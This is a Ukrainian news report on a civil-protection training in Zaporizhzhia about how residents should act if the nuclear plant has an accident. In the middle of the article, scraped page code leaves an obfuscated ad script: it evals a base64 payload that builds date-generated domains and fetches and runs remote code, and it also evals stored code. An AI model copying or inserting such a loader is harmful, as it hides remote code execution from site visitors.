Важные новости

Як діяти у разі аварії на ЗАЕС: у Запоріжжі фахівці ДСНС провели спеціальний тренінг (ФОТОРЕПОРТАЖ)

27 червня у Запоріжжі пройшов тренінг щодо дій населення на випадок аварії на ЗАЕС, на якому фахівці ДСНС описали покроково, що буде відбуватися у разі надзвичайної ситуації.

Тренінг «Журналістам – про радіаційну безпеку. Що робити у разі радіаційної аварії. Алгоритм дій» відбувся у Запорізькому Центрі журналістської солідарності НСЖУ. Про це повідомляє коресподент «Акцента».

Начальниця відділу зв’язків зі ЗМІ ГУ ДСНС Запорізької області Юлія Баришева підкреслює, що «тренінг проводиться не через те, що аварія обов’язково станеться, а тому що ознайомлений — означає озброєний».

«Раджу знайти Кодекс цивільного захисту. Для мене як для полковника ДСНС це керівництво до дії, а для як для пересічної громадянки — це Конституція безпеки. Ви знайдете у ньому всі відповіді на питання, які виникатимуть», — дала пораду пристунім Юлія Баришева на початку тренінгу.

Організатором дій населення у разі аварії на ЗАЕС буде Запорізька обласна військова адміністрація, якій у свою чергу підпорядковуватимуться і інші спеціальні служби. Саме тому вся потрібна інформація у разі аварії буде транслюватися засобами і каналами ЗОВА. У тому числі про те, чи слід приймати йодид калію або інші медикаменти.

«ДСНС у разі аварії на ЗАЕС буде здійснювати допомогу в оповіщенні населення, у проведенні евакуації та проведенні радіаційної розвідки на маршрутах евакуації. Також ми будемо здійснювати санітарну обробку людей і техніки, робити деактивацію забрудененої техніки. Також будемо проводити аврійні роботи у разі аварії на ЗАЕС», — розповідає Кирило Кузьменко, головний фахівець відділу інженерно-технічних заходів та оповіщення Управління організації заходів цивільного захисту ГУ ДСНС у Запрізькій області.

Рекомендації для наслення

Вже створено 11 постів спеціального спостереження, які двічі на добу роблять замір радіаційно-хімічного забруднення. Наразі показники знаходяться у нормі, але при їх перевищенні штаб надасть відповідні команди.

У разу надзвичайної всіми доступними каналами на радіо і телебачення буде транслюватися сигнал «Увага всім!«. Після чого влада повідомить громадянам про аварію і надасть важливі рекомендації у залежності від того, як буде розгортатися ситуація. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Головне завдання кожного – не панікувати. Якщо почуємо сигнал тривоги, то необхідно дотримуватися такого плану:

увімкнути радіо чи телебачення місцевого мовлення; прослухати звернення до населення, яке прозвучить після вимкнення сирени; виконати рекомендації;

Також знайти можливість сповістити про почуте сусідам чи знайомим, за необхідності, допомогти їм. Рятувальники показали медійникам наповнення тривожної валізи: там обовʼязково мають бути запаси їжі, води та ліків, документи.

Також план дій громадян буде залежати від їхнього місця перебування під час аварії і від того, як радіаційний пил буде розносити вітер. Голове під час перебування на вулиці — закрити органи дихання і шукати укриття, під час перебування у приміщенні — загерметизувати його доступними засобами, щоб крізь вікна і вентиляцію не потрапили радіоактивні частинки. В укритті необхідно слідкувати за повідомленніями органів влади.

Наприкрінці тренінгу учасників навчили робити марлеві повʼязки для захисту органів дихання.

«Пам’ятаймо, що наше головне завдання — залишити зону ураження, якщо ми знаходимося на вулиці. На цей час потрібно спеціальними або підручними засобами закрити органи дихання, щоб зберегти щитовидну залозу», — розповів присутнім Валентин Олійник, методист навчального центру ДСНС,

Підготував Ігор Гур’єв (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/yak-diyati-u-razi-avariyi-na-zaes-u-zaporizhzhi-fahivtsi-dsns-proveli-spetsialnij-trening-fotoreportazh/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top